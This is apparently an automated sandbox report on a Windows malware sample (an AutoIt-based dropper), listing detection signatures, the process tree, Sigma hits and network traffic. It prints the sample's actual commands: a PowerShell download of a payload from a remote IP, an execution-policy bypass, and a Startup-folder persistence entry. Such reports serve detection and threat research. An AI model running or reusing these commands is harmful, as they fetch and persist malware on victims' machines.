Windows Analysis Report
EO3RT0fEfb.exe

Overview

General Information

Sample name: EO3RT0fEfb.exe
renamed because original name is a hash value
Original sample name: c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429.exe
Analysis ID: 1577214
MD5: dc83439d47b35f0556beedbc95c57fc5
SHA1: a3674a56c0e6d0ce15936177efc40c0fb0ffe660
SHA256: c6a10001e9cd00207400da197bc724aed97fc6dde44c7b4b6ab7bf8c0916a429
Tags: 139-99-188-124, exe, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • EO3RT0fEfb.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\EO3RT0fEfb.exe" MD5: DC83439D47B35F0556BEEDBC95C57FC5)
    • powershell.exe (PID: 7544 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7760 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Guard.exe (PID: 7920 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 7936 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7176 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 7276 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7920, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7760, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7920, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7936, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7760, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7176, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7544, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7760, ProcessName: powershell.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7176, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 7276, ProcessName: SwiftWrite.pif
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7544, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7176, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EO3RT0fEfb.exe", ParentImage: C:\Users\user\Desktop\EO3RT0fEfb.exe, ParentProcessId: 7524, ParentProcessName: EO3RT0fEfb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/aiSMo" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7544, ProcessName: powershell.exe

Data Obfuscation

Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7936, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
No Suricata rule has matched

AV Detection

Source: EO3RT0fEfb.exeReversingLabs: Detection: 55%
Source: EO3RT0fEfb.exeVirustotal: Detection: 45%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: EO3RT0fEfb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF75F1BC7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BBC70
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BB7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF75F1C72A8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C71F4 FindFirstFileW,FindClose,0_2_00007FF75F1C71F4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F182F50 FindFirstFileExW,0_2_00007FF75F182F50
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF75F1CA874
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF75F1C6428
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA4F8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA350
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B64005
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00B6494A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6C2FF
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00B6CD9F
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD14 FindFirstFileW,FindClose,5_2_00B6CD14
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F5D8
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F735
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6FA36
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B63CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,12_2_002B494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD14 FindFirstFileW,FindClose,12_2_002BCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_002BCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B3CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 08:32:32 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 06 Dec 2024 09:21:58 GMTETag: "da2a8-628968bf31962"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ucZfzm.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 139.99.188.124 139.99.188.124
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: unknownDNS traffic detected: query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs replaycode: Name error (3)
Source: global trafficHTTP traffic detected: GET /aiSMo HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CE968 InternetQueryDataAvailable,InternetReadFile,0_2_00007FF75F1CE968
Source: global traffic HTTP traffic detected: GET /aiSMo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 139.99.188.124 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ucZfzm.txt HTTP/1.1 Host: 139.99.188.124 Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4810000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1792733359.000001E2B36D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
Source: EO3RT0fEfb.exe, 00000000.00000002.1741781373.0000020B9F862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124/aiSMo
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B36D8000.00000004.00000800.00020000.00000000.sdmp, PublicProfile.ps1.0.drString found in binary or memory: http://139.99.188.124/ucZfzm.txt
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4AD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.HB
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000003.00000002.1821309242.000001E2CBC7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B4DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1809768933.000001E2C3525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000005.00000003.1808485987.000000000511E000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.000000000439B000.00000004.00000020.00020000.00000000.sdmp, Guard.exe.1.dr, SwiftWrite.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
